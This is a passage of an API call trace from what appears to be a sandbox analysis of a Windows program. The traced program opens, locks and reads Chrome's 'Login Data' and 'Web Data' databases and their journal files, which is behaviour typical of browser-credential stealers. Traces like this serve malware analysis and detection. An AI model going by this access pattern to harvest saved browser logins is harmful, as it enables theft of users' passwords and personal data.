lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 77 [0069.305] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0069.305] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x50, lpBuffer=0x8aa838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpFilePart=0x0) returned 0x4c [0069.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0069.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x8aa8e0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpUsedDefaultChar=0x0) returned 77 [0069.305] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x196150, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0069.305] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x196150, cbMultiByte=-1, lpWideCharStr=0x8aa790, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 77 [0069.305] GetDiskFreeSpaceW (in: lpRootPathName="C:", lpSectorsPerCluster=0x19625c, lpBytesPerSector=0x196258, lpNumberOfFreeClusters=0x19625c, lpTotalNumberOfClusters=0x19625c | out: lpSectorsPerCluster=0x19625c, lpBytesPerSector=0x196258, lpNumberOfFreeClusters=0x19625c, lpTotalNumberOfClusters=0x19625c) returned 1 [0069.305] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x1963c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1963c0*=0) returned 0x0 [0069.305] ReadFile (in: hFile=0x260, lpBuffer=0x196414, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x1963e0, lpOverlapped=0x0 | out: lpBuffer=0x196414*, lpNumberOfBytesRead=0x1963e0*=0x64, lpOverlapped=0x0) returned 1 [0069.309] LockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0069.309] LockFileEx (in: hFile=0x260, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x19609c | out: lpOverlapped=0x19609c) returned 1 [0069.309] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.309] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b05, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0069.309] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b05, cbMultiByte=-1, lpWideCharStr=0x8a9df0, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 85 [0069.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), fInfoLevelId=0x0, lpFileInformation=0x19608c | out: lpFileInformation=0x19608c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d75fa, ftCreationTime.dwHighDateTime=0x1d2d443, ftLastAccessTime.dwLowDateTime=0x710d75fa, ftLastAccessTime.dwHighDateTime=0x1d2d443, ftLastWriteTime.dwLowDateTime=0x74fb42e6, ftLastWriteTime.dwHighDateTime=0x1d2d59f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0069.310] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1960c0 | out: lpFileSizeHigh=0x1960c0*=0x0) returned 0x11000 [0069.310] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b5a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0069.310] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b5a, cbMultiByte=-1, lpWideCharStr=0x8a9df0, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal") returned 81 [0069.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data-wal"), fInfoLevelId=0x0, lpFileInformation=0x1960a4 | out: lpFileInformation=0x1960a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.310] GetLastError () returned 0x2 [0069.310] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1960d8 | out: lpFileSizeHigh=0x1960d8*=0x0) returned 0x11000 [0069.311] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x196080*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x196080*=0) returned 0x0 [0069.311] ReadFile (in: hFile=0x260, lpBuffer=0x783124, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1960a0, lpOverlapped=0x0 | out: lpBuffer=0x783124*, lpNumberOfBytesRead=0x1960a0*=0x800, lpOverlapped=0x0) returned 1 [0069.311] SetFilePointer (in: hFile=0x260, lDistanceToMove=24576, lpDistanceToMoveHigh=0x195ee0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x195ee0*=0) returned 0x6000 [0069.311] ReadFile (in: hFile=0x260, lpBuffer=0x78452c, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x195f00, lpOverlapped=0x0 | out: lpBuffer=0x78452c*, lpNumberOfBytesRead=0x195f00*=0x800, lpOverlapped=0x0) returned 1 [0069.320] SetFilePointer (in: hFile=0x260, lDistanceToMove=26624, lpDistanceToMoveHigh=0x195ea8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x195ea8*=0) returned 0x6800 [0069.320] ReadFile (in: hFile=0x260, lpBuffer=0x78ec44, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x195ec8, lpOverlapped=0x0 | out: lpBuffer=0x78ec44*, lpNumberOfBytesRead=0x195ec8*=0x800, lpOverlapped=0x0) returned 1 [0069.320] SetFilePointer (in: hFile=0x260, lDistanceToMove=45056, lpDistanceToMoveHigh=0x195eb8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x195eb8*=0) returned 0xb000 [0069.320] ReadFile (in: hFile=0x260, lpBuffer=0x791d2c, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x195ed8, lpOverlapped=0x0 | out: lpBuffer=0x791d2c*, lpNumberOfBytesRead=0x195ed8*=0x800, lpOverlapped=0x0) returned 1 [0069.320] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.321] LockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0069.321] LockFileEx (in: hFile=0x260, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x19637c | out: lpOverlapped=0x19637c) returned 1 [0069.321] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.321] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b05, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0069.321] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b05, cbMultiByte=-1, lpWideCharStr=0x8a9e48, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 85 [0069.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), fInfoLevelId=0x0, lpFileInformation=0x19636c | out: lpFileInformation=0x19636c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d75fa, ftCreationTime.dwHighDateTime=0x1d2d443, ftLastAccessTime.dwLowDateTime=0x710d75fa, ftLastAccessTime.dwHighDateTime=0x1d2d443, ftLastWriteTime.dwLowDateTime=0x74fb42e6, ftLastWriteTime.dwHighDateTime=0x1d2d59f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0069.321] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1963b8 | out: lpFileSizeHigh=0x1963b8*=0x0) returned 0x11000 [0069.321] SetFilePointer (in: hFile=0x260, lDistanceToMove=24, lpDistanceToMoveHigh=0x1963a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1963a4*=0) returned 0x18 [0069.321] ReadFile (in: hFile=0x260, lpBuffer=0x1963e4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x1963c4, lpOverlapped=0x0 | out: lpBuffer=0x1963e4*, lpNumberOfBytesRead=0x1963c4*=0x10, lpOverlapped=0x0) returned 1 [0069.321] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1963a0 | out: lpFileSizeHigh=0x1963a0*=0x0) returned 0x11000 [0069.321] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b5a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0069.321] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9b5a, cbMultiByte=-1, lpWideCharStr=0x8a9e48, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal") returned 81 [0069.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data-wal"), fInfoLevelId=0x0, lpFileInformation=0x196384 | out: lpFileInformation=0x196384*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.321] GetLastError () returned 0x2 [0069.321] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1963b8 | out: lpFileSizeHigh=0x1963b8*=0x0) returned 0x11000 [0069.321] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.322] CloseHandle (hObject=0x260) returned 1 [0069.322] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data")) returned 0x20 [0069.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0069.337] CloseHandle (hObject=0x260) returned 1 [0069.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x197f00, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpUsedDefaultChar=0x0) returned 79 [0069.337] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x197f00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0069.337] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x197f00, cbMultiByte=-1, lpWideCharStr=0x790f50, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 79 [0069.337] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0069.337] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x52, lpBuffer=0x790ff8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4e [0069.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0069.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x7909d8, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpUsedDefaultChar=0x0) returned 79 [0069.337] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x7903b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0069.337] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x7903b8, cbMultiByte=-1, lpWideCharStr=0x790f50, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 79 [0069.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0069.338] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x7903b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0069.338] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x7903b8, cbMultiByte=-1, lpWideCharStr=0x790ff8, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 79 [0069.338] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0069.338] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x52, lpBuffer=0x7904c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4e [0069.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0069.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x790770, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpUsedDefaultChar=0x0) returned 79 [0069.338] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x196150, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0069.338] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x196150, cbMultiByte=-1, lpWideCharStr=0x790ff8, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 79 [0069.338] GetDiskFreeSpaceW (in: lpRootPathName="C:", lpSectorsPerCluster=0x19625c, lpBytesPerSector=0x196258, lpNumberOfFreeClusters=0x19625c, lpTotalNumberOfClusters=0x19625c | out: lpSectorsPerCluster=0x19625c, lpBytesPerSector=0x196258, lpNumberOfFreeClusters=0x19625c, lpTotalNumberOfClusters=0x19625c) returned 1 [0069.338] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x1963c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1963c0*=0) returned 0x0 [0069.338] ReadFile (in: hFile=0x260, lpBuffer=0x196414, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x1963e0, lpOverlapped=0x0 | out: lpBuffer=0x196414*, lpNumberOfBytesRead=0x1963e0*=0x64, lpOverlapped=0x0) returned 1 [0069.340] LockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0069.340] LockFileEx (in: hFile=0x260, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x19609c | out: lpOverlapped=0x19609c) returned 1 [0069.340] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.340] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x790407, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0069.340] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x790407, cbMultiByte=-1, lpWideCharStr=0x8a9fb0, cchWideChar=87 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 87 [0069.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), fInfoLevelId=0x0, lpFileInformation=0x19608c | out: lpFileInformation=0x19608c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ed6d5, ftCreationTime.dwHighDateTime=0x1d2d443, ftLastAccessTime.dwLowDateTime=0x712ed6d5, ftLastAccessTime.dwHighDateTime=0x1d2d443, ftLastWriteTime.dwLowDateTime=0x74e598ca, ftLastWriteTime.dwHighDateTime=0x1d2d59f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0069.340] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1960c0 | out: lpFileSizeHigh=0x1960c0*=0x0) returned 0x4800 [0069.340] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x79045e, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0069.340] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x79045e, cbMultiByte=-1, lpWideCharStr=0x8a9fb0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal") returned 83 [0069.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data-wal"), fInfoLevelId=0x0, lpFileInformation=0x1960a4 | out: lpFileInformation=0x1960a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.341] GetLastError () returned 0x2 [0069.341] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1960d8 | out: lpFileSizeHigh=0x1960d8*=0x0) returned 0x4800 [0069.341] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x196080*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x196080*=0) returned 0x0 [0069.341] ReadFile (in: hFile=0x260, lpBuffer=0x78574c, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1960a0, lpOverlapped=0x0 | out: lpBuffer=0x78574c*, lpNumberOfBytesRead=0x1960a0*=0x800, lpOverlapped=0x0) returned 1 [0069.341] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.341] LockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0069.341] LockFileEx (in: hFile=0x260, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1962ac | out: lpOverlapped=0x1962ac) returned 1 [0069.341] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.341] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x790407, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0069.341] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x790407, cbMultiByte=-1, lpWideCharStr=0x790ff0, cchWideChar=87 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 87 [0069.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), fInfoLevelId=0x0, lpFileInformation=0x19629c | out: lpFileInformation=0x19629c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ed6d5, ftCreationTime.dwHighDateTime=0x1d2d443, ftLastAccessTime.dwLowDateTime=0x712ed6d5, ftLastAccessTime.dwHighDateTime=0x1d2d443, ftLastWriteTime.dwLowDateTime=0x74e598ca, ftLastWriteTime.dwHighDateTime=0x1d2d59f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0069.341] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1962e8 | out: lpFileSizeHigh=0x1962e8*=0x0) returned 0x4800 [0069.341] SetFilePointer (in: hFile=0x260, lDistanceToMove=24, lpDistanceToMoveHigh=0x1962d4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1962d4*=0) returned 0x18 [0069.341] ReadFile (in: hFile=0x260, lpBuffer=0x196314, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x1962f4, lpOverlapped=0x0 | out: lpBuffer=0x196314*, lpNumberOfBytesRead=0x1962f4*=0x10, lpOverlapped=0x0) returned 1 [0069.341] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x1962d0 | out: lpFileSizeHigh=0x1962d0*=0x0) returned 0x4800 [0069.341] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x79045e, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0069.341] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x79045e, cbMultiByte=-1, lpWideCharStr=0x790ff0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal") returned 83 [0069.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\login data-wal"), fInfoLevelId=0x0, lpFileInformation=0x1962b4 | out: lpFileInformation=0x1962b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.341] GetLastError () returned 0x2 [0069.341] GetFileSize 